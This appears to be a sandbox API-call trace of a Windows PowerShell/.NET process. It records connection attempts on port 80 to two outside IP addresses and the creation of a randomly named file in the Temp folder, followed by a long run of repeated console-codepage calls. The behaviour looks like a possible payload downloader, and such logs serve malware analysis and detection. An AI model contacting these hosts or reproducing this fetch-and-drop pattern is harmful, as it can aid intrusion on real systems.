WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x834 [0169.252] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x838 [0169.258] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508dd10*=0x828, lpdwindex=0xafa508dae4 | out: lpdwindex=0xafa508dae4) returned 0x80010115 [0169.259] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508dd10*=0x830, lpdwindex=0xafa508dae4 | out: lpdwindex=0xafa508dae4) returned 0x80010115 [0169.272] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508df48 | out: phkResult=0xafa508df48*=0x83c) returned 0x0 [0169.272] RegQueryValueExW (in: hKey=0x83c, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0xafa508df88, lpData=0x0, lpcbData=0xafa508df80*=0x0 | out: lpType=0xafa508df88*=0x0, lpData=0x0, lpcbData=0xafa508df80*=0x0) returned 0x2 [0169.272] RegCloseKey (hKey=0x83c) returned 0x0 [0169.275] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x83c [0169.285] WSAEventSelect (s=0x834, hEventObject=0x83c, lNetworkEvents=16) returned 0 [0169.286] WSAConnect (in: s=0x834, name=0x2380090d1f0*(sa_family=2, sin_port=0x50, sin_addr="87.236.146.93"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned -1 [0169.298] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x864 [0169.299] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xafa508e320*=0x804, lpdwindex=0xafa508e0f4 | out: lpdwindex=0xafa508e0f4) returned 0x0 [0186.432] CloseHandle (hObject=0x804) returned 1 [0186.889] EtwEventWriteTransfer () returned 0x0 [0187.104] CoTaskMemAlloc (cb=0x20e) returned 0x2386d708500 [0187.104] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2386d708500, nSize=0x105 | out: lpBuffer="") returned 0x0 [0187.104] CoTaskMemFree (pv=0x2386d708500) [0187.105] EtwEventActivityIdControl () returned 0x0 [0187.105] EtwEventActivityIdControl () returned 0x0 [0187.105] EtwEventActivityIdControl () returned 0x0 [0187.107] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x888 [0187.107] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x1388, cHandles=0x1, pHandles=0xafa5088c80*=0x888, lpdwindex=0xafa5088a54 | out: lpdwindex=0xafa5088a54) returned 0x80010115 [0192.096] EtwEventActivityIdControl () returned 0x0 [0192.114] CloseHandle (hObject=0x888) returned 1 [0192.122] CoTaskMemAlloc (cb=0x20e) returned 0x2386d706fc0 [0192.122] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x2386d706fc0, nSize=0x105 | out: lpBuffer="") returned 0x24 [0192.122] CoTaskMemFree (pv=0x2386d706fc0) [0192.123] CoTaskMemAlloc (cb=0x20e) returned 0x2386d701460 [0192.123] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x2386d701460, nSize=0x105 | out: lpBuffer="") returned 0x24 [0192.123] CoTaskMemFree (pv=0x2386d701460) [0192.123] CoTaskMemAlloc (cb=0x20e) returned 0x2386d706fc0 [0192.123] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2386d706fc0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0192.124] CoTaskMemFree (pv=0x2386d706fc0) [0192.124] EtwEventActivityIdControl () returned 0x0 [0192.124] EtwEventActivityIdControl () returned 0x0 [0192.124] EtwEventActivityIdControl () returned 0x0 [0192.208] QueryPerformanceCounter (in: lpPerformanceCount=0xafa508e3f8 | out: lpPerformanceCount=0xafa508e3f8*=3485318841825) returned 1 [0192.209] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x710 [0192.209] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508df50*=0x788, lpdwindex=0xafa508dd24 | out: lpdwindex=0xafa508dd24) returned 0x80010115 [0192.209] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508df00*=0x778, lpdwindex=0xafa508dcd4 | out: lpdwindex=0xafa508dcd4) returned 0x80010115 [0192.210] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508df00*=0x780, lpdwindex=0xafa508dcd4 | out: lpdwindex=0xafa508dcd4) returned 0x80010115 [0192.210] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508dfd0*=0x7a8, lpdwindex=0xafa508dda4 | out: lpdwindex=0xafa508dda4) returned 0x80010115 [0192.210] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508dfd0*=0x7b0, lpdwindex=0xafa508dda4 | out: lpdwindex=0xafa508dda4) returned 0x80010115 [0192.211] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508dfd0*=0x7b8, lpdwindex=0xafa508dda4 | out: lpdwindex=0xafa508dda4) returned 0x80010115 [0192.211] SetEvent (hEvent=0x6f4) returned 1 [0192.212] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508dfc0*=0x828, lpdwindex=0xafa508dd94 | out: lpdwindex=0xafa508dd94) returned 0x80010115 [0192.212] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508dfc0*=0x830, lpdwindex=0xafa508dd94 | out: lpdwindex=0xafa508dd94) returned 0x80010115 [0192.213] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7fc [0192.213] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x718 [0192.214] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508dd10*=0x828, lpdwindex=0xafa508dae4 | out: lpdwindex=0xafa508dae4) returned 0x80010115 [0192.214] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xafa508dd10*=0x830, lpdwindex=0xafa508dae4 | out: lpdwindex=0xafa508dae4) returned 0x80010115 [0192.215] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x808 [0192.215] WSAEventSelect (s=0x7fc, hEventObject=0x808, lNetworkEvents=16) returned 0 [0192.215] WSAConnect (in: s=0x7fc, name=0x23800544c28*(sa_family=2, sin_port=0x50, sin_addr="147.135.248.250"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned -1 [0192.218] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x71c [0192.218] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xafa508e320*=0x710, lpdwindex=0xafa508e0f4 | out: lpdwindex=0xafa508e0f4) returned 0x0 [0192.538] CloseHandle (hObject=0x710) returned 1 [0192.544] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\anomoeomery.metalizedCredence" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\anomoeomery.metalizedcredence")) returned 0xffffffff [0192.564] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0xafa508de10, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16 [0192.565] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\anomoeomery.metalizedCredence", nBufferLength=0x105, lpBuffer=0xafa508de30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\anomoeomery.metalizedCredence", lpFilePart=0x0) returned 0x46 [0192.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e310) returned 1 [0192.565] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\anomoeomery.metalizedCredence" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\anomoeomery.metalizedcredence"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x710 [0192.567] GetFileType (hFile=0x710) returned 0x1 [0192.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e280) returned 1 [0192.567] GetFileType (hFile=0x710) returned 0x1 [0192.575] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0192.577] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x274, lpConsoleScreenBufferInfo=0xafa508e1e8 | out: lpConsoleScreenBufferInfo=0xafa508e1e8) returned 1 [0192.579] GetConsoleOutputCP () returned 0x1b5 [0192.581] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508dfc8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508dfc8) returned 0 [0192.582] GetConsoleOutputCP () returned 0x1b5 [0192.582] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508df78, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508df78) returned 0 [0192.582] GetConsoleOutputCP () returned 0x1b5 [0192.582] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508df18, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508df18) returned 0 [0192.583] GetConsoleOutputCP () returned 0x1b5 [0192.584] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.584] GetConsoleOutputCP () returned 0x1b5 [0192.584] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.584] GetConsoleOutputCP () returned 0x1b5 [0192.584] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.584] GetConsoleOutputCP () returned 0x1b5 [0192.584] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.584] GetConsoleOutputCP () returned 0x1b5 [0192.585] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.585] GetConsoleOutputCP () returned 0x1b5 [0192.585] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.585] GetConsoleOutputCP () returned 0x1b5 [0192.585] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.585] GetConsoleOutputCP () returned 0x1b5 [0192.585] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.585] GetConsoleOutputCP () returned 0x1b5 [0192.586] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.586] GetConsoleOutputCP () returned 0x1b5 [0192.586] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.586] GetConsoleOutputCP () returned 0x1b5 [0192.586] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.586] GetConsoleOutputCP () returned 0x1b5 [0192.586] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.586] GetConsoleOutputCP () returned 0x1b5 [0192.587] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.587] GetConsoleOutputCP () returned 0x1b5 [0192.587] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.587] GetConsoleOutputCP () returned 0x1b5 [0192.587] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.587] GetConsoleOutputCP () returned 0x1b5 [0192.588] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.588] GetConsoleOutputCP () returned 0x1b5 [0192.588] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.588] GetConsoleOutputCP () returned 0x1b5 [0192.588] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.588] GetConsoleOutputCP () returned 0x1b5 [0192.588] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.588] GetConsoleOutputCP () returned 0x1b5 [0192.589] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.589] GetConsoleOutputCP () returned 0x1b5 [0192.589] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.589] GetConsoleOutputCP () returned 0x1b5 [0192.589] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.589] GetConsoleOutputCP () returned 0x1b5 [0192.589] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.589] GetConsoleOutputCP () returned 0x1b5 [0192.590] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.590] GetConsoleOutputCP () returned 0x1b5 [0192.590] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.590] GetConsoleOutputCP () returned 0x1b5 [0192.590] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.590] GetConsoleOutputCP () returned 0x1b5 [0192.590] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.591] GetConsoleOutputCP () returned 0x1b5 [0192.591] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.591] GetConsoleOutputCP () returned 0x1b5 [0192.591] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.591] GetConsoleOutputCP () returned 0x1b5 [0192.591] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.591] GetConsoleOutputCP () returned 0x1b5 [0192.592] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.592] GetConsoleOutputCP () returned 0x1b5 [0192.592] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.592] GetConsoleOutputCP () returned 0x1b5 [0192.592] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.592] GetConsoleOutputCP () returned 0x1b5 [0192.592] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.592] GetConsoleOutputCP () returned 0x1b5 [0192.593] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.593] GetConsoleOutputCP () returned 0x1b5 [0192.593] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.593] GetConsoleOutputCP () returned 0x1b5 [0192.593] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.593] GetConsoleOutputCP () returned 0x1b5 [0192.593] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.593] GetConsoleOutputCP () returned 0x1b5 [0192.594] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.594] GetConsoleOutputCP () returned 0x1b5 [0192.594] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.594] GetConsoleOutputCP () returned 0x1b5 [0192.594] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.594] GetConsoleOutputCP () returned 0x1b5 [0192.594] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.595] GetConsoleOutputCP () returned 0x1b5 [0192.595] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.595] GetConsoleOutputCP () returned 0x1b5 [0192.595] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.595] GetConsoleOutputCP () returned 0x1b5 [0192.595] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.596] GetConsoleOutputCP () returned 0x1b5 [0192.596] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.596] GetConsoleOutputCP () returned 0x1b5 [0192.596] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.596] GetConsoleOutputCP () returned 0x1b5 [0192.596] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.596] GetConsoleOutputCP () returned 0x1b5 [0192.597] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.597] GetConsoleOutputCP () returned 0x1b5 [0192.597] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.597] GetConsoleOutputCP () returned 0x1b5 [0192.597] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.597] GetConsoleOutputCP () returned 0x1b5 [0192.597] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.597] GetConsoleOutputCP () returned 0x1b5 [0192.598] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.598] GetConsoleOutputCP () returned 0x1b5 [0192.598] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.598] GetConsoleOutputCP () returned 0x1b5 [0192.598] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.598] GetConsoleOutputCP () returned 0x1b5 [0192.598] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.598] GetConsoleOutputCP () returned 0x1b5 [0192.599] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.599] GetConsoleOutputCP () returned 0x1b5 [0192.599] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.599] GetConsoleOutputCP () returned 0x1b5 [0192.599] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.599] GetConsoleOutputCP () returned 0x1b5 [0192.599] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.600] GetConsoleOutputCP () returned 0x1b5 [0192.600] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.600] GetConsoleOutputCP () returned 0x1b5 [0192.601] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.601] GetConsoleOutputCP () returned 0x1b5 [0192.601] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.601] GetConsoleOutputCP () returned 0x1b5 [0192.602] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.602] GetConsoleOutputCP () returned 0x1b5 [0192.602] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.602] GetConsoleOutputCP () returned 0x1b5 [0192.602] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.602] GetConsoleOutputCP () returned 0x1b5 [0192.602] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.603] GetConsoleOutputCP () returned 0x1b5 [0192.603] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.603] GetConsoleOutputCP () returned 0x1b5 [0192.603] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.603] GetConsoleOutputCP () returned 0x1b5 [0192.603] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.603] GetConsoleOutputCP () returned 0x1b5 [0192.604] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.604] GetConsoleOutputCP () returned 0x1b5 [0192.604] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.604] GetConsoleOutputCP () returned 0x1b5 [0192.604] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.604] GetConsoleOutputCP () returned 0x1b5 [0192.604] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.604] GetConsoleOutputCP () returned 0x1b5 [0192.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.605] GetConsoleOutputCP () returned 0x1b5 [0192.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.605] GetConsoleOutputCP () returned 0x1b5 [0192.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.605] GetConsoleOutputCP () returned 0x1b5 [0192.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.605] GetConsoleOutputCP () returned 0x1b5 [0192.606] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.606] GetConsoleOutputCP () returned 0x1b5 [0192.606] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.606] GetConsoleOutputCP () returned 0x1b5 [0192.606] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xafa508e0e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xafa508e0e8) returned 0 [0192.606] GetConsoleOutputCP () returned 0x1b5 